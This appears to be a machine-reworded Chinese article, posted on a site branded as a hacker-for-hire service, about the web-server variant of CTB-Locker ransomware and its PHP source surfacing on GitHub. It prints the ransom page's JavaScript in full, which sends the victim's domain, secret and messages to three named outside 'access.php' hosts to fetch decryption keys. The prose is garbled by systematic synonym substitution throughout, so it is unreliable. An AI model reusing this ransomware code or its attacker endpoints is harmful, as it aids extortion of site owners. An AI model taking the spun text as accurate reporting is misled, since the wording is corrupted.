Web版勒索软件CTB-Locker PHP源码现身GitHub

访客5年前关于黑客接单435

勒索软件CTB-Locker呈现其Web演化版别,可感染网页站点。据剖析,其编码为选用PHP编写,现在源码已被保管至GitHub上。
Web版勒索软件CTB-Locker的初次呈现
就在本年西方情人节前夕,英国的一位站长却有一个不愉快的发现,他查看到其办理的网站页面遭受篡改,篡改页面上呈现的信息看起来跟电脑感染歹意勒索软件的景象类似,其主要信息是让站点办理员付出比特币,交换相应目录文件的解密,以便使站点康复正常。篡改页面如下图,


 
在被验证为初次针对网页的勒索工作后,该工作便得到极大的重视。但其实作为服务器办理员来说,初步都只是期望这仅仅是一次性工作,而不是进犯者预谋的初步。
在初始阶段,实际上并无发现其他感染工作,而状况在曩昔的一个星期中有了极大的改变。在这段时间内频频呈现上述的网页勒索感染工作。据悉,到现在有超越100个同类型工作被发现。在篡改的信息中其暗地操纵者要求受害者付出0.4个比特币,而且如在两天内未完成付出,付出额度将提高至0.8个比特币。以下为其要求付出比特币的源码:
script>
admins = ["http://orangecountyplasterandstucco.com/access.php", "http://klinika-redwhite.com/access.php", "http://charoenpan.com/access.php"];
iadmin = 0;
domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);
function post_admin(postdata, onsuccess) {
   $.post(admins[iadmin], postdata+"&domain="+domain, function (data) {
         if (data["status"] == "success") {
            onsuccess(data);
         } else {
            alert(data["status"]);
         }
      }, 'json'
   ).fail(function() {
      alert(iadmin >= 2 ? 'It seems like our server is down=( Try to push it again' : 'Push it again');
      iadmin = (iadmin + 1) % 3;
   });
}
$('#decrypt').click(function() {
   post_admin("decrypt=", function(data) {
      alert('Your decryption key is ' + data["decrypt"] + '! Wait while page will be updated!');
      url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
      window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];
   });
});
$('#dectest').click(function() {
   post_admin("dectest=&secret="+($("#secret").val()), function(data) {
      alert('Your test decryption key is ' + data["dectest"] + '! Wait while page will be updated!');
      url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
      window.location.href = url + 'dectest=' + data["dectest"] + '&secret=' + data["secret"];
   });
});
$('#sendmsg').click(function() {
   msg = "&msg=" + encodeURIComponent($("#chatmsg").val());
   post_admin("sendmsg=&secret="+$("#secret").val()+msg, function(data) {
      alert('Thank you for feedback!');
   });
});
$('#recvmsg').click(function() {
   post_admin("recvmsg=&secret="+$("#secret").val(), function(data) {
      $("#chatmsg").val(data["answer"]);
   });
});
   script>
该勒索程序在勒索付出告诉上,跟CTB-Locker为同一模型。但单单从技术上来看,这跟“声名远扬”的CTB-Locker勒索软件的状况不符。因其仅运转于Windows桌面环境,而并无法运转在 Linux Web服务器上。
Web版CTB-Locker选用PHP编写
来自 Stormshield的安全剖析员Benkow,设法剖析勒索软件的运转形式并从一个受感染的目标提取到了源代码。随后,Benkow将Web版CTB-Locker 源码上传至 KernelMode论坛上,供其他安全研讨人员剖析和研讨。而Web版CTB-Locker的“知名度”便敏捷提高,其源码也被保管至GitHub。
源代码地址请点击:GitHub
考虑到,此前勒索软件Hidden Tear源码也保管至GitHub,但工作终究却没有朝着有利于用户的方向发展。而结合当时的景象,能够预见,在接下来的数个月中,将或许呈现大规模的针对网页站点进行的进犯感染。

[1] [2]  黑客接单网

相关文章

Zabbix运用Pycurl模块监控web页面状况

因为网络的问题,zabbix自带web模块用不了,后台研制2b,老是更新正式环境安装包,导致一向出问题,老是给他们擦屁股,早说过这事,他们不合作,现在出问题了,挺爽j_0025.gif,这锅我表明不背...

鱼叉式网络钓鱼攻击——一份关于攻击动机、技术和预防方法的完整指南-黑客接单平台

每天都有不计其数的鱼叉式垂钓邮件发送给全世界的受害者。 进犯有许多不同的途径,不管怎样进犯,都会对您的网络形成损伤。 所以,精确的、有针对性的进行剖析和履行是至关重要的。 在本指南中,咱们将介绍鱼叉式...

恣意用户暗码重置(四):重置凭据未校验

在逻辑缝隙中,恣意用户暗码重置最为常见,或许出现在新用户注册页面,也或许是用户登录后重置暗码的页面,或许用户忘掉暗码时的暗码找回页面,其间,暗码找回功用是重灾区。我把日常浸透过程中遇到的事例作了缝隙成...

由此次阿里云事情谈粗犷的安全防护手法

 昨日阿里接连爆出了两个有意思的事情,一是阿里云服务器呈现毛病,导致误删除了许多用户文件( http://www.weibo.com/1747505067/CyvEkrxPS );二是阿里供认下一年校...

Web安全之点击绑架(ClickJacking)

 点击绑架(ClickJacking)是一种视觉上的诈骗手法。大概有两种方法,一是攻击者运用一个通明的iframe,掩盖在一个网页上,然后诱运用户在该页面上进行操作,此刻用户将在不知情的情况下点击通明...

运用Burp的intruder功用测验有csrf维护的应用程序

许多Web运用会有避免跨站恳求假造的战略,比方经过request恳求传一个当时页面有用或许当时会话有用的参数(假如他们没有,那就很值得研讨)。这些参数用来证明这个恳求是从预订用户宣布的,而不是进犯者那...